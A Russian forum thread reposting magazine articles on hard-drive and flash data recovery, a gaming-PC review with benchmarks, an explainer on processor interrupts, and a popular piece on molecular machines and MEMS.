Именно на выход из строя БМГ приходится большая часть случаев, когда восстановить данные невозможно. Головка при выходе из строя запиливает поверхность блина, и все драгоценные данные в буквальном смысле слова оседают на фильтре в виде серого налета. В связи с конструктивными свойствами и особенностями работы жестких дисков достаточно одного «запила» (не всей поверхности, а лишь одной небольшой части) для того, чтобы данные оттуда считать было невозможно. Или, по крайней мере, невозможно в рамках разумных финансовых затрат. Все это происходит потому, что головка при попадании на запиленную область мгновенно выходит из строя.

Реанимируем флэшку

Для восстановления данных с горелых флэшек используется специальные программаторы, на которых считывается содержимое выпаянной флэш-памяти. Специально разработанный для этих целей программатор производится московской фирмой Soft-Center. Основная трудность восстановления данных в этом случае — декодирование. Данные при записи на микросхему располагаются определенным, меняющимся от модели к модели способом. Производители о способах кодирования не рассказывают и, по всей видимости, рассказывать не собираются. Поэтому когда приносят на восстановление флэшку новой модели, сначала требуется определенное время, чтобы разобраться, каким образом на ней расположены данные. Другой вариант восстановления – найти точно такую же флэшку и перепаять на нее память с горевшей. В этом случае не нужно заниматься дешифрованием. Задачу значительно усложняет тот факт, что модельные ряды флэшек меняются очень часто. Найти точно такую же зачастую очень сложно или вообще невозможно.

Инструментарий специалиста

Основными инструментами грамотного специалиста по восстановлению данных являются голова и прямые руки. Следующим по важности является программно-аппаратный комплекс, который используется при диагностике и ремонте. Именно на этом оборудовании, в технологических режимах работы накопителей и производятся такие операции, как, например, перепрошивка ПЗУ-контроллера и восстановление служебной информации. Как правило, он представляет собой специальную плату, которая вставляется в PCI-слот обычного компьютера, и набор программного обеспечения. Совместно с этим оборудованием используются различные кабели, переходники, контроллеры управления питанием. Существует два наиболее известных у нас в стране комплекса: PC-3000, производства Ростовской фирмы ACELab и комплекс HRT, который производит московская BVG-Group. Они используются для работы с IDE- и SATA- дисками, а для SCSI-интерфейса доступен SCSI-тестер производства ACELab. Эти же комплексы закупаются и успешно используются в работе ведущими зарубежными компаниями.

Некоторые специалисты не пользуются покупными комплексами, а пишут свои программы для аналогичных целей (с диском в технологическом режиме можно работать и на обычном контроллере). Серьезными организациями в основном практикуется комплексный подход – используются возможности PC-3000 и HRT, плюс софт разработанный самостоятельно и совместно с партнерами, так как есть задачи, которые серийные комплексы решать пока не в состоянии. К примеру, ни в PC-3000, ни в HRT нет возможности работать с дисками производства Conner Technology (был такой производитель), и для этих целей нашим сотрудником была написана утилита. Сейчас она лежит в свободном доступе на сайте http://rlab.ru/files/.

Кроме того, в арсенал средств восстановителя входят различные программаторы для микросхем других типов, обычные паяльные станции, паяльные станции на горячем воздухе, электрические тестеры, микроскопы, осциллографы, пылезащитные боксы, плюс всякий мелкий инструмент типа хитрых пинцетов и съемников, отверток всяких.

Активно применяется и общеизвестный софт. С нашей точки зрения, лучшими являются продукты R-Studio и EasyRecovery. Для ковыряния диска на нижнем уровне обычно используется популярный шестнадцатеричный редактор WinHex. Помимо этого активно используются собственные разработки, а также софт, который идет со специализированным железом.

Не теряй надежду

Разумеется, мы не ставили себе цель научить тебя восстанавливать убитые жесткие диски — оставь это профессионалам. Но, прочитав статью, ты должен понять, насколько сложна работа специалистов по восстановлению данных. Используемые методы требуют многолетнего опыта и кропотливой работы. Но зато теперь ты понимаешь общие принципы и можешь смело нести умерший хард на реанимацию, с уверенностью, что данные, скорее всего, удастся восстановить.

Настоящие гуру помогут даже в самых экзотических случаях. К сожалению, о многих из них приходится молчать ввиду конфиденциальности. Но вот тебе пример: парням из R.LAB удалось восстановить данные с ноутбука, который ощутил на себе всю мощь цунами.

Самый главный миф о восстановление данных

Миф: Любые удаленные данные можно восстановить на основании остаточной намагниченности на краях дорожек. Она появляется из-за того, что головка не позиционируется с абсолютной точностью и всегда есть небольшое смещение. В доказательство обычно приводятся непонятные фотографии магнитных полей на старых дисках малой емкости (порядка сотен мегабайт).

Наш ответ: миф чистейшей воды. Теория, конечно, не исключает возможности восстановления данных — просто практически это представляется неимоверно дорогой затеей, которая вообще никак не гарантирует успех и, скорее всего, приведет к получению бессмысленной мешанины отрывков информации. Ну, скажем, остаточную намагниченность удалось считать с краев нескольких секторов. Что дальше? От каких записей эти куски? Недельной или, может, годовалой давности? Части ли это одного файла или разных, как они соотносятся между собой? Одни вопросы и абсолютно никаких ответов.

Но это еще не все. Для того чтобы получить эту мешанину, потребуется корректно интерпретировать и обработать полученную информацию о напряженностях магнитного поля, решить проблему отделения технической информации от пользовательской, декодировать (просто так ничего на харде не хранится — для записи используется целый набор алгоритмов сжатия и кодирования). В общем, ввиду ряда особенностей устройства жестких дисков стоимость этой операции сопоставима со стоимостью разработки новой модели диска, и результат будет применим только к этой конкретной модели.

Точно так же нельзя восстановить данные с куска блина или склеить разбитый блин и считать информацию оттуда. Поэтому если услышишь: «Есть умельцы, которые это делают. Вот у меня брат такого знает, он работает в ФСБ», то отправляй его куда подальше — он гонит.

Беспощадная расправа с данными

Для того чтобы гарантированно удалить данные с диска, его не надо привязывать к атомной бомбе и взывать. Вполне достаточно записать что-нибудь на то место, где хранилась конфиденциальная информация, пускай даже забить нулями. Это называется secure erase’ом и поддерживается массой программ. Acronis Drive Cleanser (www.acronis.ru), к примеру, поддерживает 7 алгоритмов безопасного удаления данных, в том числе многопроходных. «Восстановить данные после такого безобразия уже не удастся, даже частично», — говорят ведущие специалисты в этой области.

Огромное спасибо компании R.LAB за гостеприимный прием нашей команды (Nititoz, Step, Gorl). Парни во всех подробностях рассказали нам о восстановлении данных с HDD/RAID/флэш-накопителей, показали оборудование и используемый софт, а позже напоили нас чаем с тортиком и просто составили веселую компанию. Ознакомиться с услугами компании и найти схему проезда в их офис ты сможешь на сайте www.rlab.ru. Рекомендуем!

DVD

На диске ты найдешь весь софт, необходимый для восстановления данных, а также материалы по теме.



Автор: Metallica Nov 20 2006, 21:26

KIT GAMER 430Комп для хакеров, которые жестко гамают

Технические характеристики:

Процессор, ГГц: 3.4, Intel Pentium D 950

Память, Гб: 4, DDR2-533 Kingston Dual Channel

Системная плата: ASUS P5WD2 Premium (Intel i995X)

Видеоплата, Мб: 512, Sapphire ATI Radeon X1900XT

Жесткий диск, Гб: 2x400, Seagate Barracuda

Аудиоплата: Realtek ALC882/D/M, Intel 82801GB ICH7, High Definition Audio

Сетевая плата: 2xGigabit LAN

Оптический накопитель: DVD+\-RW NEC ND-4571A

Дополнительно: кардридер 5-in-1, два вентилятора на корпусе, замок на корпусе, безвинтовая сборка-разборка и установка устройств

Собрать мощный компьютер, который мог бы выполнять абсолютно любые задачи, и при этом позволял бы гонять в самые современные игры – мечта каждого. Но тут сразу возникает масса проблем, в основном это выбор подходящих комплектующих. На рынке масса новинок, устройства устаревают быстрее, чем ты успеваешь накопить деньги. Поэтому пока ты определялся с выбором, например процессора, на прилавках появилось три новых, а еще пять обещают выпустить в ближайшие дни. Что же делать? Отказаться от своей идеи? Конечно же, нет! Просто нужно часть проблем переложить на чужие плечи. То есть приобрести готовый ПК самой мощной конфигурации, что-то в ней незначительно изменив. Голова пусть болит у сборщиков, а ты просто будешь наслаждаться приобретением. Компьютер KIT GAMER 430 обладает современнейшей начинкой, которая предоставит тебе неограниченные возможности в играх и других приложениях.

Методика тестирования

Подключив системный блок и установив все необходимые драйвера, мы стали внимательно изучать систему. Во-первых, это визуальный осмотр корпуса и его внутренностей: как собран, много ли свободного места, что установлено, есть ли разные дополнительные вещи, вроде вентиляторов и безвинтовых креплений. Второй этап гораздо серьезнее – это тестирование на производительность. В качестве тестовых приложений мы использовали синтетические тесты компании Futuremark: 3DMark 2003, 3DMark 2005, 3DMark 2006 (в основном нагружают графическую подсистему) и PCMark 2005 (комплексный тест всего ПК) – они запускались с «дефолтными» настройками качества. Кроме того, использовались игры Doom 3, Far Cry, F.E.A.R. и Half-Life 2, которые прогонялись в довольно тяжелом режиме - максимальные графические настройки и разрешение 1600x1200.

Но и на этом мы не остановились. По окончании тестирования был проведен комплексный разгон системы: процессор с 3,4 ГГц был «ускорен» до 4,08 ГГц (FSB 240 МГц), память при этом успешно работала в режиме DDR600. У видеокарты частоты были повышены с 500 до 570 МГц для GPU и с 595 до 711 МГц для памяти. Естественно, для осуществления задумки пришлось немного поднять напряжения питания: для чипа на видеокарте оно составило 1,250 вместо 1,175 В, для процессора – 1,45 В против дефолтных 1,33 В.

Результаты тестов

3DMark'03, баллы: 18175

3DMark'05, баллы: 9416

3DMark'06, баллы: 5583

PCMark'05, баллы: 5926

Doom 3, FPS: 89.2

Far Cry, FPS: 138.2

Serious Sam 2, FPS: 102

Half-Life 2, FPS: 133.57

WinRAR, Kbps: 534

WinRAR Multithreaded, Kbps: 820

Lame, сек: 21

Результаты тестов (разгон)

3DMark'03, баллы: 18539

3DMark'05, баллы: 10402

3DMark'06, баллы: 5738

PCMark'05, баллы: 6744

Doom 3, FPS: 93.2

Far Cry, FPS: 151.56

Serious Sam 2, FPS: 118.9

Half-Life 2, FPS: 143.09

WinRAR, Kbps: 552

WinRAR Multithreaded, Kbps: 873

Lame, сек: 17

Процессор

Созданный по 65 нм технологии, двуядерный Intel Pentium D 950 для разъема LGA775 обладает ярко выраженной силой. На каждом из его горячих и быстрых сердец расположено по 2 Мб кэш-памяти второго уровня, тактовая частота составляет 3,4 ГГц, а шины – 800 МГц. Кроме того, он поддерживает такие фирменные разработки Intel, как виртуализация, Enhanced SpeedStep, EM64T и Execute Disable.Bit.

Память

Памяти тут целых 4 Гб DDR2-533, установлена она в четырех гнездах (работает в двухканальном режиме). Такого количества быстрой ОЗУ хватит для выполнения любых задач, что в сочетании с мощью других комплектующих обеспечит тебе долгое отсутствие необходимости проведения модернизации.

Видеоплата

Монструозное устройство от компании Sapphire, в конструкции которого использованы чип ATI Radeon X1900XT и 512 Мб быстрой памяти DDR3. Помимо скорости работы, велики и габариты платы: она очень длинная, а массивная система охлаждения занимает два слота на матери. Также ей требуется дополнительное питание. Впрочем, все эти особенности, благодаря хорошему корпусу и мощному БП, никак не осложнят жизнь пользователю. А вот результаты тестов его наверняка впечатлят, особенно малое падение производительности при включении режимов АА и АF (это тяжелые режимы, которые значительно повышают реалистичность). А благодаря возможности повышения напряжения питания чипа и памяти с помощью софта девайс имеет немалый разгонный потенциал!

Системная плата

На плате ASUS P5WD2 Premium имеется абсолютно все. Это и двухканальный режим работы памяти DDR2, и технология ATI CrossFire – так что о скорости работы системы думать не приходится. Кроме того, имеется контроллер SATA-2 вместе с возможностью создания RAID-массивов, 8-канальный звуковой кодек и два сетевых гнезда. Нельзя не отметить и массу фирменных решений и технологий ASUS, которые применены в устройстве: они сделают использование платы более быстрым, надежным и удобным. Среди них каждый найдет для себя что-то полезное – и оверклокер, и начинающий пользователь.

Накопители

Да, о таком раньше можно было только мечтать – два жестких диска Seagate Barracuda объемом 400 Гб, объединенные в RAID-массив. Теперь проблема свободного места отпадает начисто! Благодаря фирменным технологиям ASUS обеспечивается безопасность информации, а интерфейс SATA-2 отвечает за скоростную работу дисковой подсистемы. Оптическим приводом здесь является универсальный DVD-накопитель, который умеет читать и записывать любые форматы болванок, включая двухслойные. Не стоит забывать и о такой приятной вещи, как пятиформатный кардридер.

Аудиоплата

Звуковая подсистема устройства представлена встроенным в системную плату 7.1 кодеком. Конечно, это не студийное оборудование, но для домашнего использования он вполне сгодится. Кроме того, удобство использования – штекер можно вставить в любой разъем, а настроить все соответствующим образом позволит специальная утилита. Сделать это легко – графический интерфейс прост и понятен

Блок питания

Мощному ПК – мощный БП! В данном устройстве установлен 460 Вт блок питания производства компании FSP, который стабильно запитывает весь компьютер, включая сильную видеоплату, нуждающуюся в дополнительном источнике энергии. Благо ее тут хватает, а обширный пучок проводов, где есть все необходимые разъемы, позволяет обойтись без переходников.

Корпус

Внутреннее убранство корпуса: кабели аккуратно свернуты, устройства устанавливаются без помощи винтов и отвертки. Спереди и сзади установлены дополнительные вентиляторы, а тепло от процессора выводится наружу через специальный раструб на боковой стенке. На переднюю панель выведены порты USB, FireWire и аудиоразъемы, а также кардридер. Кроме того, корпус сам по себе довольно симпатичный, выкрашен в черный и серый цвета.

Выводы

Как показали тесты, система КИТ GAMER 430 на все сто процентов оправдывает свое название. Благодаря мощным компонентам она легко справляется как с самыми современными сложными играми, так и с большинством современных приложений. Еще один плюс – неплохой оверклокерский потенциал данной машины, обусловленный хорошо разгоняемым процессором и видеокартой, снабженной качественным кулером и возможностью повышения напряжений питания. В общем, если ты увлекаешься современными «стрелялками» и не представляешь себе, как можно опускать планку качества изображения ниже максимальной, данная «тачка» как раз для тебя.



Автор: Metallica Nov 20 2006, 23:20

Прервись на минуткуРабота прерываний в операционных системах

Не секрет, что прерывания являются важнейшей частью работы операционной системы. Но задумывался ли ты, что это такое? Для чего они нужны и как работают? Едва ли.

[прерывание и исключения]

В архитектуре любого процессора предусмотрены особые случаи, когда процессор прерывает выполнение текущей программы и немедленно передает управления программе-обработчику, специально написанной для обработки подобной ситуации. Такие ситуации встречаются сплошь и рядом. Чтобы это осознать, предлагаю немного пофантазировать. Абстрагируйся от современных многозадачных систем, оснащенных мощными системными планировщиками. Просто представь, что всего этого не существует — есть лишь «голая» однопроцессорная система. Если этой системе дать невыполнимое задание, скажем, подсчитать точное значение числа Пи, то она будет выполнять его целую вечность. Рано или поздно, этот процесс придется остановить, но как? Процессор не реагирует ни на что — он пыхтит над заданном ему заданием. Вот тут-то и потребуется прерывание. Ты жмешь нужную клавишу на клавиатуре — это нажатие обрабатывает контроллер клавиатуры, который передает процессору специальный сигнал «нажата клавиша». Этот сигнал с сообщением, по большому счету, и есть прерывание. Оно понятно процессору, поэтому его внутренние механизмы прерывают выполнение текущей последовательности команд и обращаются к специальной подпрограмме - обработчику прерывания. В нашем случае это обработчик прерывания клавиатуры. По умолчанию в нем прописано много всякой всячины (например, перезагрузка по Ctrl-Alt-Del), но для того, чтобы реализовать остановку процесса, необходимо его немного видоизменить. Достаточно добавить туда обработку нужной нам клавиши, обозначив для нее действие «создать флаг завершения вычислений» — и готово. Теперь, когда управление возвратится обратно в программу, она получит останавливающий ее флаг и прекратит вычисления.

Подобных подход активно использовался программистами под DOS. Сейчас, когда механизмы многозадачности возложены на саму ОС, в нем нет прямой необходимости. Да и обратится к обработчикам прерывания напрямую уже не так легко.

Вместе с тем прерывания по-прежнему выполняют ведущую роль в планировании процессов — просто ты этого не замечаешь.

[типы прерываний]

Рассмотренное нами прерывание — это лишь частный случай. На самом деле прерывания в компьютере бывают самые разные, и их даже можно классифицировать. В зависимости от источника, они делятся на три больших класса: внешние, внутренние и программные.

Внешние прерывания инициируются сигналами от аппаратных устройств (вернее их контроллеров): всевозможных устройств ввода-вывода, внешних накопителей, различной периферии (принтеров, сканеров) и т.д. Именно поэтому внешние прерывания также называют аппаратными. Необходимость в них наглядно демонстрирует пример выше. Нажатие клавиатуры обязательно должно быть зафиксировано — ведь оно по идеи должно влиять на процесс дальнейших вычислений. Такие прерывания возникают между выполнением двух соседних инструкций, а после их обработки система продолжает выполнение процесса, начиная со следующей инструкции.

Внутренние прерывания, они же исключения (exeption), возникают в результате аварийной ситуации в ходе выполнения некоторой инструкции самой проги. Примерами эксепшенов являются деление на нуль, ошибки защиты памяти, обращения по несуществующему адресу, попытка выполнить привилегированную инструкцию в пользовательском режиме и т.п. Если бы не было соответствующих прерываний, то отследить бы и грамотно обработать исключительные ситуации было невозможно.

Что касается программных прерываний, то они возникают при выполнении особой команды процессора. Такие прерывания используются программистом намеренно — в нужном участке кода он просто вставляет ассемблерную команду INT, указывая после нее номер прерывания.

[приоретизация и маскирование прерываний]

У прерываний есть приоритет, с помощью которого они ранжируются по степени важности и срочности. Прерывания с одинаковым приоритетом относятся к одному уровню приоритета прерываний. Механизм прерываний должен поддерживать приоритезацию и маскирование прерываний. Приоритезация подразумевает, что все существующие источники, «рождающие» прерывания подразделяются на классы, а этим классам в свою очередь назначаются соответствующие уровни приоритетов запросов на прерывания. Приоритеты могут обслуживаться как относительные и абсолютные. Обслуживание запросов прерываний по схеме с относительными приоритетами заключается в том, что при одновременном поступлении запросов прерываний из разных классов выбирается запрос, имеющий высший приоритет. Причем обработчик прерывания ни при каких условиях не может быть остановлен. В случае, когда более приоритетным прерываниям разрешается приостанавливать работу процедур обслуживания менее приоритетных прерываний, имеет место приоритезации с абсолютными приоритетами.

Упорядоченное обслуживание запросов прерываний наряду со схемами приоритетной обработки запросов может выполняться механизмом маскирования запросов. Собственно говоря, в описанной схеме абсолютных приоритетов выполняется маскирование - при обслуживании некоторого прерывания все запросы с равным или более низким приоритетом маскируются, то есть не обслуживаются. Схема маскирования предполагает возможность временного маскирования прерываний любого класса независимо от уровня приоритета. На практике это предоставляет массу возможностей.

[обработка на практике]

Вот обобщенная последовательность действий аппаратных и программных средств по обработке прерывания. Сначала происходит первичное распознавания типа прерывания. В том случае, если прерывания подобного типа в данный момент запрещены (механизмом маскирования или приоритетной схемой), то центральный процессор продолжает исполнение тех команд, которые идут своим естественным ходом. Иначе, исходя из данных, которые поступили на вход процессора, происходит автоматический вызов обработчика прерывания, адрес которой находится в специальной таблице операционной системы (таблица векторов прерываний).

Далее автоматически сохраняется определенная часть контекста прерванного потока, которая позволит ядру возобновить процесс после обработки возникшего прерывания. Сохраняются значения счетчика команд, слова состояния машины, хранящего признаки основных режимов работы процессора (пример такого слова - регистр EFLAGS в Intel Pentium) и т.д.

Затем адрес обработчика прерывания загружается в счетчик команд, а в системные регистры загружаются данные, которые определяют режимы работы процессора при обработке прерывания.

После того как прерывание обработано ядром операционной системы, прерванный контекст восстанавливается, и работа потока возобновляется с прерванного места. Часть контекста восстанавливается аппаратно по команде возврата из прерываний (например, адрес следующей команды и слово состояния машины), а часть - программным способом, с помощью явных команд извлечения данных из стека.

Правильное планирование процедур, вызываемых по прерываниям, – необходимое условие того, чтобы пользовательские потоки были спланированы правильно. Иначе в системе возможно появление таких ситуаций, когда операционная система будет длительное время занята какой-нибудь задачей управления стримером, сжимающим данные, в то время, когда высокоскоростной диск будет попросту простаивать. Тем самым будет заторможена работа многочисленных приложений, которые по своей природе вынуждены обмениваться данными с этим диском. Для того чтобы упорядочить работу обработчиков прерываний, в операционных системах используют такой же способ, что и для упорядочения работы юзерских процессов – механизм приоритетных очередей.

[это нужно знать!]

Любой уважающий себя кодер должен понимать как, когда и зачем происходят прерывания. Без этого практически невозможно ловить exeption’ы, правильно строить код, работающий тесно с процессором. Работе с прерываниями практически любому программисту, ну и хакеру соответственно, приходится уделять много времени. Они существенно увеличивают эффективность и стабильность вычислительной системы.

[программные прерывания]

Программные прерывания позволяют передать управления подпрограмме с помощью специализированной инструкции процессора, такой как INT в процессорах Intel Pentium. При выполнении подобной команды процессор начинает обрабатывать такую же последовательность команд, как и при возникновении внешнего или внутреннего прерывания, различие лишь в том, что прерывание происходит в предсказуемой, заранее известной точке программы. Следует четко понимать, что оно происходит именно в том месте, где программист помещает данную команду. Отмечу, что все современные процессоры обладают инструкциями программных прерываний в системе команд. Инструкции программных прерываний появились в системе команд с той целью, чтобы сделать код программ зачастую более компактным в сравнении с использованием стандартных команд выполнения процедур.

Это легко объяснить тем, что разработчики процессора, как правило, резервируют для возможности обработки прерываний некоторое количество подпрограмм таким образом, что длина операнда в команде программного прерывания, который указывает на нужную подпрограмму, меньше, чем в команде перехода на подпрограмму.

Например, в процессоре х86 (возьмем его для наглядности) предусмотрена возможность применения 256 программ обработки прерываний, поэтому в инструкции INT операнд имеет длину в один байт (а инструкция INT 3, которая предназначена для вызова отладчика, вся имеет длину один байт). Значение операнда команды INT просто является индексом в таблице из 256 адресов подпрограмм обработки прерываний, один из которых и используется для перехода по команде INT. При использовании команды CALL потребовался бы уже не однобайтовый, а двух- или четырехбайтовый операнд. Другой причиной применения программных прерываний вместо обычных инструкций вызова подпрограмм является возможность смены пользовательского режима на привилегированный одновременно с вызовом процедуры - это свойство программных прерываний поддерживается большинством процессоров.

INFO

Программные прерывания часто используются для выполнения ограниченного количества вызовов функций ядра операционной системы, то есть системных вызовов.




Автор: Metallica Nov 21 2006, 12:54

Молекулярные машины


Однажды мне под руку попалась книжка об украинском дядьке-миниатюристе Николае Сядристом, который в 60-е годы прошлого века делал такие миниатюры, что не снились многим сегодняшним спецам с новейшим оборудованием. Посмотрев на его работы, я нашел не только электродвигатель размерами с муравья (это в 60-е годы-то!), но и другие интересные вещи: написание всяких слов на человеческом волосе, подковывание блох, изготовление шахматной доски с такими мелкими фигурками шахмат, что их было плохо видно даже в микроскоп. Один экспонат неизменно повергает в изумление всех, кто его видит впервые: муляж настоящей розы, помещенный в высверленный (!) человеческий волос.

Как рассказывал дедушка в своей книжке, до сих пор у него нет инструментов лучше, чем набор иголок и обычный оптический микроскоп, и что нужные инструменты он делал сам с помощью тех же иголок.

И вот возникла у меня мысль: почему же тогда, уже с того времени не появилось видеокамер размером с ноготь, тех же мобилок или роботов размером с муху? Или почему не сделали разных имплантатов и не напихали их в свой организм?! Правда, тогда еще было неясно, зачем их пихать в организм. Но идеи о переделке тела уже витали в воздухе.

Наверняка всяческие разведки знали о достижениях дедушки, но никто не смог употребить их себе во благо. Странно, ведь с таким заделом можно было шпионить за всеми и каждым в отдельности. Но что-то не сложилось, и у дедушки осталась только выставка в Киеве возле Лавры. Интерес у ученых к разным микроподелкам возник сразу после изобретения простейшего оптического микроскопа. Про начало миниатюризации писал в свое время Лесков в «Левше». Но тогда подковка блох была делом трудным и кропотливым, а с появлением сканирующего туннельного микроскопа начался настоящий блошиный бум.

Сканирующий туннельный микроскоп представляет собой камеру, заполненную вакуумом, в которой маленький щуп перемещается вдоль пластинки с образцом, причем образец должен обязательно проводить электричество. Между подложкой и щупом создают разность потенциалов, и через вакуум между ними протекает туннельный ток, значение которого меряют, оцифровывают и выводят на экран. В результате получается картинка микрорельефа, на которой можно видеть даже отдельные молекулы и атомы.

Но работать с таким девайсом трудно из-за того, что не все на свете проводит электричество. Например, биологические объекты - ДНК, вирусы, бактерии, белки и пр. - его не проводят. Для этих случаев используют атомно-силовой микроскоп, который работает таким же точно образом, как слепой дедушка читает книгу, написанную шрифтом Брайля (для слепых).

Его щуп в буквальном смысле «ощупывает» поверхность, а на него сверху светят лазером и по значению отклонения луча составляют трехмерную картинку рельефа поверхности.

Вот только незадача: в микромире гораздо легче что-то подсмотреть, чем сделать. Поэтому изготовление и дальнейшее подковывание электронных блох – египетский труд.

Вот и получается, что до появления фотолитографии, с помощью которой делают сегодня практически все микромеханизмы, у дедушки Сядристого не было и не могло быть конкурентов. Ведь кому нужна сверхминиатюрная камера или двигатель в единичном экземпляре, только одну деталь для которой делают года три? Естественно, никому.

[запчасти из атомного ЛЕГО]

Любой девайс, кроме ложки, вилки и гири, состоит из запчастей. Это — аксиома. Так что даже самый простой электромеханический робот размерами с эритроцит должен содержать в себе уйму всяких деталек. Чтобы впихнуть в робота и мозги, и манипуляторы, и даже простенькую систему навигации, нужно будет здорово постараться, а именно: все его части будут сделаны с атомарной точностью, то есть при конструировании деталей надо сперва разработать атомный чертеж, по которому в будущем будут собирать отдельные части роботов.

Сейчас этой довольно хитрой наукой занимается целое направление в молекулярной химии и нанотехнологии. Называется оно «математическое моделирование наноструктур и наносистем».

Говоря проще, ученые рисуют в специальных прогах модели подшипников, двигателей, манипуляторов, компьютеров, состоящие из отдельных атомов. А проги сами их проверяют на достоверность и рисуют модель того, что получилось, то есть показывают, как будет выглядеть та или иная деталь под атомно-силовым или электронным микроскопом.

Труд этот очень нудный и долгий. Иные запчасти состоят из нескольких тысяч атомов, каждый из которых нужно «впихнуть» на ему полагающееся место. При этом нельзя забывать о таблице Менделеева: атомы могут соединяться друг с другом только в определенном количестве. Например, углерод в органике имеет валентность 4. Это означает, что к нему можно присобачить только 4 других атома одинарной химической ковалентной связью.

Конструирование даже самого простого подшипника - еще тот пазл. Даже если выстроить атомы так, как нам завещал великий Менделеев, то при проверке их прогой на достоверность может оказаться, что в реале деталь будет другой формы! То есть делали мы круглый подшипник, а он вдруг начинает съеживаться и превращаться в нечто бесформенное. Такие «волшебства» связаны с тем, что любая атомная структура принимает в пространстве такую форму, чтобы минимизировать свою поверхностную энергию. Вот и выходит: собирал целый день подшипник или простой стержень, а он развались.

Но, несмотря на эти трудности, уже создан внушительный каталог разных молекулярных машин. На первый взгляд это занятие кажется бессмысленным: зачем рассчитывать такие структуры, когда их пока невозможно сделать? История развития таких исследований показала, что, когда появляются нужные инструменты, много времени тратится на возню с прототипами, которые делают методом проб и ошибок. Поэтому разрабатывать принципиально рабочие схемы надо уже сегодня, чтобы через 10 лет не тратить время на всякие эксперименты, а сразу запустить руку в обширный каталог запчастей и сварганить, к примеру, нанокомпьютера или наноробота попроще.

Вот, к примеру, простая модель – обычный подшипник, который часто и густо используют в разных механизмах. Главное отличие наноподшипника от обычного – то, что он состоит только из двух частей: внутренней и внешней. Так что круглых красивых шариков, которыми мы стреляли в детстве из рогатки, ты там не увидишь – сила трения атомных оболочек настолько мала, что он будет сам вращаться даже от теплового движения молекул при комнатной температуре!

Так вышло, что в атомном ЛЕГО присутствует только несколько видов атомов-игроков, а не вся таблица Менделеева. Самые распространенные из них: углерод, водород, кислород, сера, азот, фосфор и некоторые металлы.

Ты можешь с помощью специальной проги RazMol посмотреть все эти модельки, повертеть их в 3D и даже сделать свои, если закачаешь Trial-версию ChemOffice 2006.

Вот еще один более сложный девайс: молекулярный насос, который качает только газообразный неон. Он устроен по типу мясорубки: ты можешь видеть внутренний ротор-шнек со специально выбранными расстояниями между спиралями, подходящими аккурат к размеру молекулы неона. Выходит, куда бы ты ни поместил такой насос, он будет качать только молекулы определенного типа.

Есть еще планетарные редукторы, которые даже невозможно представить как модели: число атомов может достигать до нескольких тысяч.

Но, без сомнения, самый крутой и нужный девайс в этих разработках – наноманипулятор, спроектированный по типу руки робота.

Очень большой геморрой ожидает тех, кто будет собирать первый рабочий девайс. Это надо будет делать практически вручную, так как для того, чтобы сделать сборщика, нужен другой сборщик, а его еще не сделали smile.gif.

[первые шаги – МЭМС]

Первые шаги по направлению вниз уже сделаны. И называются они МЭМС, то есть микроэлектромеханические системы. Их производят уже двадцать пять лет – с тех пор, как только достаточно развилась технология фотолитографии, с помощью которой делают сегодня процессоры. Чтобы ты не думал, что блох подковывать – дело пустое и достойное всяких левшей-крэйзи, вот справка: рынок многофункциональных МЭМС-систем за прошлый год составил 68 миллиардов убитых енотов (по данным Network of Excellence in Multifunctional Microsystems - NEXUS) и продолжает расти.

Конечно, для того чтобы сделать что-то серьезное и получить прибыль, нужно попотеть (а где не нужно?).

Первыми, кто что-то начал делать с МЭМС, были, естественно, военные. Можно сказать, что под их опекой МЭМС развиваются довольно быстро и широко применяются в военной технике.

Например, все современные системы навигации работают благодаря инерционным измерительным устройствам на МЭМС-основе. Система из трех гироскопов и трех МЭМС-акселерометров, связанная с GPS, представляет собой навигационный блок.

Также МЭМС-сенсоры используются в системе мониторинга и охраны заданной территории от вторжения в любых погодных условиях. Ранее разработанная система дистанционных сенсоров Improved Remote Battlefield Sensor System (IREMBASS) была дорогостоящей и крупногабаритной. Компания L-3 Communications Inc. разработала REMBASS II, которая использует МЭМС для сокращения размеров сенсоров
Знаменитый беспилотник Global Hawk работает именно на системе с МЭМС-акселерометрами.

Компания Crossbow, специализирующаяся на разработке различных электронных устройств, продает систему навигации NAV420, которая позволяет дистанционно управлять практически любой военной техникой. Ее уже используют в управлении беспилотными самолетами Global Hawk, в новых машинах типа Hummer, управляемых дистанционно, а также в опытных образцах морских разведывательных судов. Особенно много хороших отзывов о работе навигатора в плохую погоду и шторм, когда пилоту трудно посадить самолет на авианосец. Встроенный GPS выдает точные координаты, скорость и высоту той машины, на которой установлен.

Все это благодаря МЭМС-сенсорам, которые играют очень важную роль в системах навигации.

Кроме сенсоров, МЭМС – это, в большинстве своем, различные моторчики, переключатели, шестеренки и прочая дребедень.

Компании, изготавливающие МЭМС, часто проделывают рекламные трюки. Вот подковывать блоху мы уже умеем. А слабо прокатить эту же блоху на карусели?

Чтобы привлечь к себе внимание, крупнейшая компания по выпуску и разработке МЭМС — МЕМХ-лаборатория — сварганила систему шестеренок с диском в центре. Вся эта механика довольно забавно крутилась, и тогда один из крэйзи предложил наловить на кладбище клещей и усадить их на диски, чтобы покатать.

Сказано – сделано. В те годы (примерно 1996 год) это достижение было не только рекламным трюком, но и демонстрацией возможностей фирмы. Надо ли говорить, что после этого аттракциона у фирмы клиентов прибавилось?

Но это было в далеких девяностых. Сегодня же вместо МЭМС широко используются НЭМС – наноэлектромеханические системы.

Уже созданные быстродействующие НЭМС-акселерометры будут использоваться в военной экипировке будущего поколения с целью детектировать удар пули о бронежилет настолько быстро, чтобы успел включиться внешний экзоскелет костюма.

Военные машины предполагают оснастить специальной "электромеханической краской", которая позволит им менять цвет наподобие хамелеона, а также предотвратит коррозию и сможет "затягивать" мелкие повреждения на корпусе машины. "Краска" будет состоять из большого количества наномеханизмов, которые будут выполнять все вышеперечисленные функции.

А с помощью системы оптических матриц, которые будут отдельными наномашинами в "краске", исследователи хотят добиться эффекта невидимости машины или самолета. Миниатюрные камеры будут считывать изображение с одной стороны устройства, передавая его на фотоэлементы на другой стороне, формируя таким образом изображение заднего фона впереди машины. Кульно, правда? Первые испытания прототипа уже проходят! А внедрение его на поле боя - в 2009.

[нанобагги]

Спускаться вниз по размерной лестнице очень трудно. В прошлом году ученые из университета Райса совершили прорыв в наномеханике. Они синтезировали наименьшую в мире движущуюся наномашину, которая ездит как настоящий автомобиль.

